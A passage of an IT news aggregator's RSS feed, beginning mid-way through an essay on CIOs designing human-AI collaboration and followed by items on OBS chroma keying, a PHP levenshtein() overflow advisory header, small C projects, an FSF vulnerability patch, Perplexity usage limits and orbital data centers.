<p>A common trait among organizations where AI adoption is not progressing as expected is that they introduce AI only to specific parts of their operations without changing the underlying processes or methods of human work. While this may seem like the easiest approach at first glance, it actually results in the least effective use of AI’s capabilities and minimizes the value it can deliver. In short, while JTCs (traditional Japanese companies) think in terms of where to introduce AI based on existing business processes, AIFCs (AI-first companies) rebuild business processes on the premise that AI exists.</p>



<p>To truly realize collaboration between humans and AI, it is necessary to break down the business processes themselves. This involves visualizing the elements within the work—such as problem definition, data collection, organization, decision-making, dialogue, resolution, evaluation, and improvement—and designing and transforming each step to determine whether it should be entrusted to AI, handled by humans, or carried out collaboratively by both. This is not merely the introduction of AI, but the design and transformation of the business, its operations, and its organization.</p>



<p>At Kansai Electric Power, there are use cases such as the transformation of the entire sales process using AI, support for knowledge and technical succession in the thermal power division, support for regulatory compliance checks, and the enhancement of the internal help desk. However, we believe the significance lies in the fact that this is not merely the introduction of AI or partial optimization, but rather the integration of AI after taking a bird’s-eye view of the entire workflow, with the ultimate goal of achieving overall optimization.</p>



<p>Thus, the CIO must act not as the person responsible for AI implementation, but as the architect of business transformation.</p>



<h2 class="wp-block-heading">The CIO is a collaborative designer, not an AI implementation manager</h2>



<p>The role expected of a CIO in the AI era is not merely to drive AI adoption. It is to envision a future where humans and AI work together, and to translate that vision into implementable business processes, systems, rules, and organizational culture.</p>



<p>In this sense, it can be said that the CIO is not an AI implementation manager but a collaborative designer. What should humans specialize in, and in which areas should AI be used? What should humans take on more heavily, and what should they let go of? Continuously answering these questions is the CIO’s essential job.</p>



<p>Moreover, this design is not a one-time effort. As long as AI itself continues to evolve rapidly, the nature of collaboration will also continue to evolve. That is precisely why a CIO should not be the one who provides the right answers, but rather the one who continually asks the right questions. The key is not how much to entrust to AI, but rather what humans should hone in an era where AI exists. Continuously asking this question is what determines a company’s competitiveness.</p>



<h2 class="wp-block-heading">Beyond collaboration lies a relationship where humans and AI enhance each other</h2>



<p>When people hear the term human-AI collaboration, many likely think first of efficiency and increased productivity. However, the true goal lies beyond that. It is not merely about using AI to reduce human workloads but about using AI to expand human potential.</p>



<p>Rather than humans merely mastering AI, we must create a relationship where humans and AI mutually enhance one another. Only when such collaboration becomes firmly established will companies truly gain a competitive advantage in the AI era.</p>



<p>The future that CIOs should envision is not an organization where AI takes away people’s jobs. It is an organization where, with AI as a partner, people can engage with customers and society in a more creative, more meaningful way.</p>



<p>What does collaboration between humans and AI entail?</p>



<p>We must not leave this question vague but rather think it through thoroughly and bring it to fruition.</p>



<p>Is this not the crucial mission entrusted to the CIO in the AI era?</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to make OBS chroma key smarter by using Background Replacement in macOS]]></title>
<description><![CDATA[If you want to use chroma key effect in a streaming or video conference app, but you can't get a physical green screen background in place, you can fake it. All by using Background Replacement in macOS.You can do Chroma Key in OBS without a green screen, thanks to macOS. Whether it is streaming g...]]></description>
<link>https://tsecurity.de/de/3617093/ios-mac-os/how-to-make-obs-chroma-key-smarter-by-using-background-replacement-in-macos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617093/ios-mac-os/how-to-make-obs-chroma-key-smarter-by-using-background-replacement-in-macos/</guid>
<pubDate>Tue, 23 Jun 2026 05:08:18 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[If you want to use chroma key effect in a streaming or video conference app, but you can't get a physical green screen background in place, you can fake it. All by using Background Replacement in macOS.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67951-143280-obsnongreenscreen1-xl.jpg" alt="Bearded man wearing Yeah Man shirt in a video recording preview on OBS Studio interface, with large OBS logo overlaid on the left and a desert landscape background" height="738"><br><span>You can do Chroma Key in OBS without a green screen, thanks to macOS. </span></div><br>Whether it is streaming gameplay to Twitch or improving your Zoom calls, sometimes you want to replace the background with something else. It's unprofessional to have a background that includes piles of dirty clothes, random dinner plates, and other unsightly items.<br><br>When it comes to using tools like Zoom or FaceTime, you can get around that by blurring the background, or even replace the background with a picture.<br><br><br> <a href="https://appleinsider.com/articles/26/06/23/how-to-make-obs-chroma-key-smarter-by-using-background-replacement-in-macos?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244735?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[PHP 8.5.7 `levenshtein()` signed-integer overflow]]></title>
<description><![CDATA[Posted by Khashayar Fereidani on Jun 20# PHP 8.5.7 `levenshtein()` signed-integer overflow

**Author:** Khashayar Fereidani
**Disclosure Date:** 2026-06-18
**Advisory:** https://fereidani.com/php-857-levenshtein-signed-integer-overflow
**Contact:** https://fereidani.com/contact

## Description

T...]]></description>
<link>https://tsecurity.de/de/3613062/it-security-nachrichten/php-857-levenshtein-signed-integer-overflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3613062/it-security-nachrichten/php-857-levenshtein-signed-integer-overflow/</guid>
<pubDate>Sun, 21 Jun 2026 06:22:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Posted by Khashayar Fereidani on Jun 20</p># PHP 8.5.7 `levenshtein()` signed-integer overflow<br>
<br>
**Author:** Khashayar Fereidani<br>
**Disclosure Date:** 2026-06-18<br>
**Advisory:** <a rel="nofollow" href="https://fereidani.com/php-857-levenshtein-signed-integer-overflow">https://fereidani.com/php-857-levenshtein-signed-integer-overflow</a><br>
**Contact:** <a rel="nofollow" href="https://fereidani.com/contact">https://fereidani.com/contact</a><br>
<br>
## Description<br>
<br>
The `levenshtein()` function calculates the Levenshtein distance<br>
between two strings, optionally accepting custom costs for insertion,<br>
replacement, and deletion operations. In PHP 8.5.7, the...<br>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pulse, my very first C only project]]></title>
<description><![CDATA[I have been teaching myself systems programming over the past year by building software in C, and I just released the first public version of one of my projects: Pulse. a lightweight Linux monitoring dashboard that:  reads system metrics directly /proc serves a web interface using its own HTTP se...]]></description>
<link>https://tsecurity.de/de/3612770/linux-tipps/pulse-my-very-first-c-only-project/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3612770/linux-tipps/pulse-my-very-first-c-only-project/</guid>
<pubDate>Sat, 20 Jun 2026 23:08:14 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I have been teaching myself systems programming over the past year by building software in C, and I just released the first public version of one of my projects: Pulse.</p> <p>a lightweight Linux monitoring dashboard that:</p> <ul> <li>reads system metrics directly /proc</li> <li>serves a web interface using its own HTTP server</li> <li>has minimal dependencies</li> <li>is written entirely in C</li> </ul> <p>The goal wasnt to build another Grafana replacement (cuz what the hell), but to create something small, understandable, and easy to run.</p> <p>This is the first public release (v0.1.0), so Im mainly looking for feedback from people who use Linux or enjoy systems programming.</p> <p>would love to know:</p> <ul> <li>What would stop you from using it?</li> <li>Is the codebase easy to navigate?</li> <li>Are there metrics you'd expect to see?</li> <li>Any obvious design mistakes?</li> </ul> <p>Repository: <a href="https://github.com/cherries-works/pulse">https://github.com/cherries-works/pulse</a></p> <p>I'm happy to answer questions about the implementation or discuss why I made certain design decisions. (I learned C less than a month ago, this is how I try to improve my knowledge, so be nice to me please lol)</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/xerrs_"> /u/xerrs_ </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1ub6n3d/pulse_my_very_first_c_only_project/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ub6n3d/pulse_my_very_first_c_only_project/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[nanotui: a terminal UI library with no dependencies, not even ncurses]]></title>
<description><![CDATA[GitHub Repository: https://github.com/bof4/nanotui AI Disclosure About 50% of this project was built with the help of AI. It was used to generate parts of the boilerplate code, implement standard ANSI rendering structures, and help condense this technical write-up. The core architecture, diffing ...]]></description>
<link>https://tsecurity.de/de/3612769/linux-tipps/nanotui-a-terminal-ui-library-with-no-dependencies-not-even-ncurses/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3612769/linux-tipps/nanotui-a-terminal-ui-library-with-no-dependencies-not-even-ncurses/</guid>
<pubDate>Sat, 20 Jun 2026 23:08:12 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>GitHub Repository: <a href="https://github.com/bof4/nanotui">https://github.com/bof4/nanotui</a></p> <h1>AI Disclosure</h1> <p>About 50% of this project was built with the help of AI. It was used to generate parts of the boilerplate code, implement standard ANSI rendering structures, and help condense this technical write-up. The core architecture, diffing logic, and specific optimization tradeoffs were designed and integrated by hand.</p> <p>I wanted a CPU/RAM monitor that draws a progress bar without pulling in half of Homebrew. That turned into <strong>nanotui</strong> — a small C library that draws boxes, gauges, charts, and tables using raw ANSI/VT100 escapes. No ncurses, no terminfo, nothing but libc.</p> <h1>Why not ncurses</h1> <p>ncurses exists because terminals used to disagree about escape sequences, so it built a terminfo database to pick the right one. That problem is mostly gone — basically every terminal since the 90s agrees on cursor positioning and SGR color.</p> <ul> <li><strong>Trade-off:</strong> No capability detection for exotic terminals, so on something genuinely weird this won't degrade gracefully, it'll just render wrong. Haven't hit that in practice.</li> <li><strong>The Payoff:</strong> The other ncurses tax is just having a library dependency at all — version drift, may-or-may-not-be-installed. For "clone + make + done," that's friction I wanted gone.</li> </ul> <h1>Diffed double buffering</h1> <p>You draw into a back buffer each frame, then <code>tui_flush()</code> diffs it against what's on screen and only repaints changed cells.</p> <pre><code>tui_clear(t); tui_text(t, 0, 0, "cpu", TUI_GREEN, TUI_DEFAULT, 0); tui_gauge(t, 0, 1, 40, cpu_pct, TUI_GREEN, NULL); tui_flush(t); </code></pre> <p>Without diffing, a full 300x80 redraw emits tens of thousands of escape chars per frame even if just one gauge bar moved. With diffing it's a few dozen cells — the difference between comfortable 4-10Hz refresh over SSH and visible stutter. Screen buffers themselves are cheap (~375KB).</p> <h1>Eighth-block glyphs</h1> <p>A 40-column gauge made of whole blocks only has 40 distinct states — 2.5% increments — so it visibly staircases instead of filling smoothly. Unicode's eight horizontal eighth-blocks (<code>▏▎▍▌▋▊▉█</code>) give 8x resolution per cell, so 320 states instead of 40. Same trick for the bar chart.</p> <ul> <li><strong>Cost:</strong> Only works for single-width codepoints — wide CJK glyphs and combining chars aren't handled.</li> </ul> <h1>16 colors, not 256</h1> <p>Deliberate choice: 16-color SGR is more universally supported than 256-color mode once you count serial consoles and older multiplexers. Didn't want to undercut the "everyone supports this" premise for a feature the widgets don't need.</p> <h1>The "&lt;1MB" claim, precisely</h1> <ul> <li><strong>Dynamic build:</strong> Actual VmRSS is ~1.9MB — inflated because RSS counts shared <code>libc.so</code>/<code>ld.so</code> pages in full even though they're shared system-wide. PSS (your proportional share) is ~680KB. Private memory the program actually owns: <strong>under 150KB</strong>.</li> <li><strong>Static build:</strong> <code>make static</code> gives ~900KB RSS — bigger on disk, but that number now reflects real ownership with no shared-library ambiguity.</li> </ul> <p>Both numbers are "true," they just answer different questions.</p> <h1>Portability &amp; Scope</h1> <p>Library needs only <code>termios</code>, <code>ioctl</code>, and <code>signal</code> — Linux, macOS, BSDs. Not Windows-portable as-is. The bundled demo is Linux-only since it reads <code>/proc</code> directly.</p> <p>This is not a replacement for ncurses or notcurses/FTXUI if you need real capability detection or wide-glyph layout. It's for the narrower case: a small tool where the whole dependency graph is just <code>libc</code>.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Automatic-Act-6626"> /u/Automatic-Act-6626 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1ub7a8s/nanotui_a_terminal_ui_library_with_no/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ub7a8s/nanotui_a_terminal_ui_library_with_no/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[FSF Patches Two-Year-Old Vulnerability Found by AI Researchers in GNU Savannah Repository]]></title>
<description><![CDATA[The Free Software Foundation's GNU Savannah hosts thousands of free software projects — both GNU and non-GNU projects, including Drupal. 

But in early May, security researchers from Hacktron.AI reported vulnerabilities and demonstrated an exploit, according to a new statement Friday from the FSF...]]></description>
<link>https://tsecurity.de/de/3612352/it-security-nachrichten/fsf-patches-two-year-old-vulnerability-found-by-ai-researchers-in-gnu-savannah-repository/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3612352/it-security-nachrichten/fsf-patches-two-year-old-vulnerability-found-by-ai-researchers-in-gnu-savannah-repository/</guid>
<pubDate>Sat, 20 Jun 2026 16:53:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Free Software Foundation's GNU Savannah hosts thousands of free software projects — both GNU and non-GNU projects, including Drupal. 

But in early May, security researchers from Hacktron.AI reported vulnerabilities and demonstrated an exploit, according to a new statement Friday from the FSF:

We have been working with these researchers since their initial report, and have also addressed additional security issues they submitted. All reported issues have been patched thanks to the hard work of GNU and FSF volunteers, as well as FSF staff. After thorough review, we have found no reason to believe that sensitive project data or credentials were accessed, nor that there has been any compromise of Savannah's software supply chain. 

Nevertheless, we take the security of the GNU system, the tools which make it possible, and the projects we host very seriously. This body of software has become essential to millions (if not billions) of users around the world. We are therefore taking additional precautionary steps. Though the initial security issue was reported to us in early May, the vulnerabilities were discovered in software that was published approximately two years prior. We will be communicating directly with Savannah-hosted projects about steps they can take to review and strengthen the security of their projects. 
We have also communicated with the other Savane instances we're aware of to assist their review of their own environments, and take any steps needed to help protect their users... This statement is intended as an initial notice. We expect to publish a report on the incident within 30 days. 

Hacktron.AI bills itself as "Your AI teammate for security." Its web page notes that its investors include Meta, DeepMind, and Perplexity.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=FSF+Patches+Two-Year-Old+Vulnerability+Found+by+AI+Researchers+in+GNU+Savannah+Repository%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F06%2F20%2F0321205%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F06%2F20%2F0321205%2Ffsf-patches-two-year-old-vulnerability-found-by-ai-researchers-in-gnu-savannah-repository%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/06/20/0321205/fsf-patches-two-year-old-vulnerability-found-by-ai-researchers-in-gnu-savannah-repository?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A key US data center law covering security and sustainability is set to lapse worryingly soon, with no sign of a replacement]]></title>
<description><![CDATA[A federal data center law covering security and sustainability may expire soon as AI infrastructure expansion increases regulatory pressure nationwide.]]></description>
<link>https://tsecurity.de/de/3611427/it-nachrichten/a-key-us-data-center-law-covering-security-and-sustainability-is-set-to-lapse-worryingly-soon-with-no-sign-of-a-replacement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611427/it-nachrichten/a-key-us-data-center-law-covering-security-and-sustainability-is-set-to-lapse-worryingly-soon-with-no-sign-of-a-replacement/</guid>
<pubDate>Sat, 20 Jun 2026 01:03:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A federal data center law covering security and sustainability may expire soon as AI infrastructure expansion increases regulatory pressure nationwide.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nach Gratisjahr über PayPal: Perplexity begrenzt Nutzung bei Aktionskonten]]></title>
<description><![CDATA[Nutzer der KI-Suchmaschine Perplexity berichten seit einigen Tagen über unerwartet schnell erreichte Nutzungslimits. Nach Angaben betroffener Anwender werden die wöchentlichen Kontingente für den Einsatz leistungsfähiger KI-Modelle inzwischen deutlich früher ausgeschöpft als bislang. Das Unterneh...]]></description>
<link>https://tsecurity.de/de/3610373/ios-mac-os/nach-gratisjahr-ueber-paypal-perplexity-begrenzt-nutzung-bei-aktionskonten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610373/ios-mac-os/nach-gratisjahr-ueber-paypal-perplexity-begrenzt-nutzung-bei-aktionskonten/</guid>
<pubDate>Fri, 19 Jun 2026 14:40:05 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://www.ifun.de/nach-gratisjahr-ueber-paypal-perplexity-begrenzt-nutzung-bei-aktionskonten-282059/"><img align="right" hspace="5" width="150" height="150" src="https://images.ifun.de/wp-content/uploads/2026/06/perplexity-limits-150x150.webp" class="alignright tfe wp-post-image" alt="Perplexity Limits" decoding="async"></a><p>Nutzer der KI-Suchmaschine Perplexity berichten seit einigen Tagen über unerwartet schnell erreichte Nutzungslimits. Nach Angaben betroffener Anwender werden die wöchentlichen Kontingente für den Einsatz leistungsfähiger KI-Modelle inzwischen deutlich früher ausgeschöpft als bislang. Das Unternehmen hat die Änderungen inzwischen bestätigt und begründet diese mit Missbrauch rund um Werbeaktionen und Gutscheincodes. Für deutsche Nutzer ist die Entwicklung […]</p>
<p>The post <a href="https://www.ifun.de/nach-gratisjahr-ueber-paypal-perplexity-begrenzt-nutzung-bei-aktionskonten-282059/">Nach Gratisjahr über PayPal: Perplexity begrenzt Nutzung bei Aktionskonten</a> first appeared on <a href="https://www.ifun.de/">ifun.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your next data center could soon be in space. Here’s why you should care]]></title>
<description><![CDATA[For the past two decades, enterprise infrastructure strategy has been shaped by one dominant assumption: the cloud is where modern computing happens. Applications moved from corporate data centers to hyperscale cloud regions. Data moved into globally distributed storage platforms. Analytics, cybe...]]></description>
<link>https://tsecurity.de/de/3609788/it-nachrichten/your-next-data-center-could-soon-be-in-space-heres-why-you-should-care/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609788/it-nachrichten/your-next-data-center-could-soon-be-in-space-heres-why-you-should-care/</guid>
<pubDate>Fri, 19 Jun 2026 11:02:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For the past two decades, enterprise infrastructure strategy has been shaped by one dominant assumption: the cloud is where modern computing happens. Applications moved from corporate data centers to hyperscale cloud regions. Data moved into globally distributed storage platforms. Analytics, cybersecurity, collaboration and enterprise software followed. More recently, artificial intelligence accelerated the shift, making cloud infrastructure the default foundation for experimentation, deployment and scale.</p>



<p>But the next phase of digital infrastructure may challenge a more basic assumption: that data centers must remain on Earth.</p>



<p>A growing number of space companies are exploring plans to build data centers in orbit. What once sounded like speculative science fiction is now entering the language of infrastructure planning. The drivers are clear: rising demand for AI compute, growing pressure on terrestrial data centers, constraints around power and cooling, the need for resilience and the increasing importance of distributed infrastructure for mission-critical operations.</p>



<p>This does not mean enterprises will soon move their ERP systems or customer databases into orbit. Nor does it mean terrestrial cloud infrastructure is going away. The more realistic and important point is that space could become a new layer in the enterprise infrastructure stack. For CIOs, this is not simply a space industry story. It is an early signal of where enterprise AI infrastructure may be heading.</p>



<h2 class="wp-block-heading">Space data centers are moving from science fiction to infrastructure planning</h2>



<p>The idea of putting compute and storage infrastructure in space has been discussed for years. Until recently, it was mostly treated as a futuristic concept. That is changing.</p>



<p>Space companies are now beginning to explore <a href="https://www.mckinsey.com/industries/technology-media-and-telecommunications/our-insights/the-case-for-data-centers-in-space" rel="nofollow">orbital data centers</a> as real infrastructure platforms. These systems could support secure storage, AI processing, disaster recovery, satellite operations, Earth observation, communications and eventually Earth-based enterprise workloads.</p>



<p>There are several reasons why orbit is becoming interesting:</p>



<p>First, space has access to abundant solar energy. In the right orbital configurations, infrastructure can benefit from long-duration exposure to sunlight, creating a potential energy advantage over data centers that must compete for constrained terrestrial power grids.</p>



<p>Second, space offers natural radiative cooling. Cooling has become one of the major cost and design challenges for AI data centers on Earth. In orbit, heat can be radiated into space, although the engineering challenge remains complex.</p>



<p>Third, space is already becoming a data-rich environment. Satellites, space stations, Earth observation platforms, communications networks and future orbital infrastructure generate vast amounts of data. Processing some of that data closer to where it is created could reduce latency, bandwidth demand and dependence on terrestrial networks.</p>



<p>Fourth, space introduces a new resilience model. Infrastructure in orbit could, in theory, provide an additional layer of continuity outside Earth-based risks such as regional outages, natural disasters, geopolitical disruptions, energy constraints or physical attacks on terrestrial infrastructure.</p>



<p>The near-term opportunity is not to replace traditional data centers. It is to extend the architecture of compute, storage and AI beyond Earth.</p>



<h2 class="wp-block-heading">Enterprise AI is exposing the limits of terrestrial infrastructure</h2>



<p>The timing matters because AI is putting unprecedented pressure on infrastructure. Traditional enterprise workloads were already driving cloud expansion. AI has changed the scale and urgency of the problem. Training models, running inference, supporting autonomous agents, processing multimodal data and deploying AI into operational workflows all require significant compute capacity.</p>



<p>For CIOs, the AI infrastructure challenge is no longer abstract. It shows up in very practical ways: GPU shortages, higher cloud bills, data center capacity constraints, power availability issues, cooling requirements, latency concerns and governance questions around where data and models reside.</p>



<p>In many markets, power has become one of the biggest constraints on data center growth. New AI data centers require enormous electricity supply, and grid interconnection is often slow. Cooling is another challenge, especially as dense AI compute clusters generate significant heat. Land availability, permitting, sustainability targets and regional concentration risk add further complexity.</p>



<p>This creates a strategic infrastructure question for enterprises: where should AI workloads run? The answer used to be relatively simple. Run them in the cloud, unless there is a strong reason not to. That answer is now becoming more nuanced.</p>



<p>Some workloads belong in hyperscale cloud environments because they need elasticity and access to advanced AI services. Some belong in private infrastructure because of cost, performance, compliance or data sensitivity. Some belong in sovereign cloud environments because of regulatory or national requirements. Some belong at the edge because latency, autonomy or local control matters.</p>



<p>In the future, a small but important category of workloads may also belong in orbit.</p>



<h2 class="wp-block-heading">Orbit could become a new extension of the enterprise cloud</h2>



<p>The most immediate use cases for space data centers are likely to be specialized. Disaster recovery, secure data storage, satellite data processing, communications resilience, Earth observation analytics, and government or defense workloads are more plausible early candidates than mainstream enterprise applications.</p>



<p>But CIOs should not dismiss specialized use cases as irrelevant. Many infrastructure shifts begin at the edge of the market before moving into the enterprise mainstream.</p>



<p>Cloud computing itself did not begin as the default choice for core enterprise systems. It started with web workloads, development environments, storage and elastic compute. Over time, it became the dominant operating model for enterprise technology.</p>



<p>Similarly, space data centers may begin with niche workloads that require resilience, autonomy or proximity to space-generated data. Over time, they could become part of a broader distributed infrastructure fabric.</p>



<p>For Earth-based operations, orbital infrastructure could support several categories of workload.</p>



<p>One is disaster recovery and business continuity. Critical data or AI systems could be replicated beyond terrestrial failure zones, creating an additional resilience layer for organizations where downtime or data loss carries severe consequences.</p>



<p>Another is secure storage. Certain sectors may eventually look at orbital storage as part of long-term archival, <a href="https://www.cio.com/article/4147102/ai-without-sovereignty-is-just-outsourced-intelligence.html">sovereign resilience</a> or high-assurance continuity planning.</p>



<p>A third is AI inference. Not all AI workloads require massive training clusters. Some require reliable, distributed inference for monitoring, detection, classification, routing and decision support. Orbital infrastructure could support AI workloads tied to global operations, satellite networks, climate systems, telecom infrastructure, maritime activity or critical infrastructure monitoring.</p>



<p>A fourth is telecom and network optimization. As satellite communications networks expand, AI-enabled infrastructure in orbit could support routing, anomaly detection, cybersecurity, spectrum management and service continuity.</p>



<p>A fifth is climate and Earth intelligence. Space-based data centers could process environmental, geospatial and atmospheric data closer to collection points, supporting faster insight for governments, insurers, energy companies, agriculture, logistics and emergency response teams.</p>



<p>These are not general-purpose enterprise workloads. They are high-value workloads where resilience, coverage, autonomy or data proximity matters.</p>



<p>That is exactly why CIOs should pay attention.</p>



<h2 class="wp-block-heading">This is not about replacing the cloud</h2>



<p>The wrong way to frame space data centers is as a replacement for terrestrial cloud.</p>



<p>The better framing is augmentation.</p>



<p>Enterprise infrastructure is already becoming hybrid. Most large organizations operate across multiple environments: public cloud, private cloud, SaaS platforms, on-prem systems, edge devices and industry-specific infrastructure. AI is making this more complex, not less.</p>



<p>Space data centers could become another layer in this architecture. Not the dominant layer. Not the cheapest layer. Not the right layer for most workloads. But potentially a valuable layer for specific workloads that require resilience, continuity, global reach or infrastructure independence.</p>



<p>The cloud itself is no longer a single place. It is a distributed operating model. Cloud regions, edge zones, sovereign clouds, private AI clusters, telecom edge nodes and industrial compute platforms are all part of the same continuum.</p>



<p>Space extends that continuum.</p>



<p>For CIOs, the practical implication is that infrastructure strategy should move from a cloud-first mindset to a workload-first mindset. The question is not “Should this run in the cloud?” The question is “Where should this workload run to deliver the best combination of performance, cost, security, resilience, compliance and control?”</p>



<p>For most workloads, the answer will remain Earth-based cloud or private infrastructure. For some, it will be the edge. For a future subset, orbit may become a viable answer.</p>



<h2 class="wp-block-heading">Enterprise AI infrastructure strategy is becoming multi-layered</h2>



<p>The rise of AI is forcing enterprises to rethink architecture in deeper ways.</p>



<p>AI is not just another application layer. It is becoming embedded into decision-making, operations, customer engagement, cybersecurity, supply chains, engineering, finance, compliance and mission-critical workflows. As AI becomes operational, the infrastructure underneath it becomes more strategic.</p>



<p>A chatbot can tolerate occasional downtime. A mission-critical AI system supporting telecom routing, energy operations, logistics resilience or defense intelligence cannot. A productivity copilot can depend on a standard cloud region. An autonomous system operating in a disconnected or contested environment may require local intelligence, secure audit trails and resilient infrastructure.</p>



<p>This is why enterprise AI infrastructure strategy is becoming multi-layered.</p>



<p>CIOs will need to think across several layers. Hyperscale cloud will remain essential for experimentation, scalability and access to AI platforms. Sovereign cloud will matter for regulated industries and public sector workloads. Private infrastructure will become important where data control, predictable cost or customization matters. Edge AI will expand wherever latency, autonomy or local decision-making is required.</p>



<p>Orbital infrastructure could eventually sit alongside these layers as a resilience and reach layer.</p>



<p>This does not mean CIOs need to budget for space data centers today. But they should begin to understand the direction of travel. The enterprise infrastructure map is expanding. AI workloads will not be placed in one environment by default. They will be distributed according to risk, performance, control and mission criticality.</p>



<p>The organizations that understand this early will be better prepared for the next phase of infrastructure competition.</p>



<h2 class="wp-block-heading">The strategic lens is optionality and control</h2>



<p>The most useful way for CIOs to think about space data centers is not novelty. It is optionality and control.</p>



<p>Space data centers could give enterprises another placement option for AI and data workloads, alongside hyperscale cloud, sovereign cloud, private infrastructure and edge environments. That matters because the future of enterprise AI will not be defined only by model performance. It will also be defined by where intelligence runs, who controls the infrastructure, how decisions are audited and whether critical systems can continue operating when terrestrial networks, regions or facilities are disrupted.</p>



<p>This is especially relevant for sectors where infrastructure failure carries outsized consequences: defense, telecom, energy, financial services, logistics, insurance, government, emergency response and critical infrastructure.</p>



<p>For these organizations, resilience is not a technical preference. It is an operating requirement.</p>



<p>CIOs should begin asking several strategic questions:</p>



<p>Which AI workloads are becoming mission-critical? Which systems need to operate even if a region, network or cloud provider is disrupted? Which data needs additional resilience beyond terrestrial infrastructure? Which workloads depend on global coverage or space-based data? Which AI decisions require verifiable audit trails? Which infrastructure dependencies create unacceptable concentration risk?</p>



<p>These questions are not only about space. They are about the future of <a href="https://www.cio.com/article/4157352/ai-is-no-longer-software-its-enterprise-infrastructure.html">enterprise AI architecture</a>.</p>



<p>Space data centers are simply making the issue more visible.</p>



<h2 class="wp-block-heading">Why CIOs should care now</h2>



<p>It would be easy to dismiss orbital data centers as too early for enterprise attention. In one sense, that is correct. Most CIOs have immediate priorities: AI governance, cloud cost control, cybersecurity, data modernization, application rationalization, regulatory compliance and talent gaps.</p>



<p>But strategic infrastructure shifts often look distant before they become unavoidable.</p>



<p>The CIOs who understood cloud early were better positioned when cloud became mainstream. The CIOs who understood mobile early were better prepared when workforces and customers moved to mobile-first interaction. The CIOs who understood cybersecurity as an enterprise risk, rather than an IT function, were better prepared for the threat landscape that followed.</p>



<p>Space-based infrastructure may follow a similar pattern.</p>



<p>The near-term task is not adoption. It is awareness, scenario planning and architectural readiness.</p>



<p>CIOs should track the development of space data centers, satellite AI, orbital compute, space-based storage and AI-enabled communications infrastructure. They should monitor which industries adopt these capabilities first. They should identify whether their own organizations have workloads where resilience, distributed compute, sovereign control or global coverage could justify future interest.</p>



<p>Most importantly, they should update their mental model of infrastructure.</p>



<p>The future of enterprise AI will not live entirely in one cloud, one data center, one country or one architecture. It will be distributed across environments designed for different operational needs.</p>



<p>Some intelligence will run in hyperscale cloud. Some will run in private AI factories. Some will run at the edge. Some will run in sovereign environments. And one day, some may run in orbit.</p>



<p>Your next data center may not be on Earth.</p>



<p>For CIOs, the message is not to chase the hype. It is to recognize the direction of infrastructure: more distributed, more resilient, more sovereign, more autonomous and increasingly shaped by the demands of AI.</p>



<p>The cloud is no longer just a place. It is becoming a fabric. And soon, that fabric may extend into space.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Perplexity Pro: Ärger bei der Gratis-Aktion für PayPal-Kunden]]></title>
